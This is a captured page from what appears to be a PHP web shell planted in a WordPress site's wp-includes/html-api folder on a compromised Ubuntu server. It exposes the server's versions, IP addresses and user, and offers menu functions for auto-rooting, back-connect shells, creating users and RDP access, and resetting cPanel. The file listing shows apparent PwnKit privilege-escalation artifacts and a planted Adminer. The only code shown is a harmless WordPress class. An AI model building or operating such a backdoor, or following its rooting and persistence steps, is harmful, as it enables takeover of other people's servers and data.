Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 18.189.194.225
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
wp-includes /
html-api /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
class-wp-html-attribute-token....
1.84
KB
-rwxrwxrwx
class-wp-html-span.php
1023
B
-rwxrwxrwx
class-wp-html-tag-processor.ph...
72.15
KB
-rwxrwxrwx
class-wp-html-text-replacement...
1.24
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-wp-html-span.php
<?php /** * HTML Span: Represents a textual span inside an HTML document. * * @package WordPress * @subpackage HTML-API * @since 6.2.0 */ /** * Represents a textual span inside an HTML document. * * This is a two-tuple in disguise, used to avoid the memory * overhead involved in using an array for the same purpose. * * This class is for internal usage of the WP_HTML_Tag_Processor class. * * @access private * @since 6.2.0 * * @see WP_HTML_Tag_Processor */ class WP_HTML_Span { /** * Byte offset into document where span begins. * * @since 6.2.0 * @var int */ public $start; /** * Byte offset into document where span ends. * * @since 6.2.0 * @var int */ public $end; /** * Constructor. * * @since 6.2.0 * * @param int $start Byte offset into document where replacement span begins. * @param int $end Byte offset into document where replacement span ends. */ public function __construct( $start, $end ) { $this->start = $start; $this->end = $end; } }
Close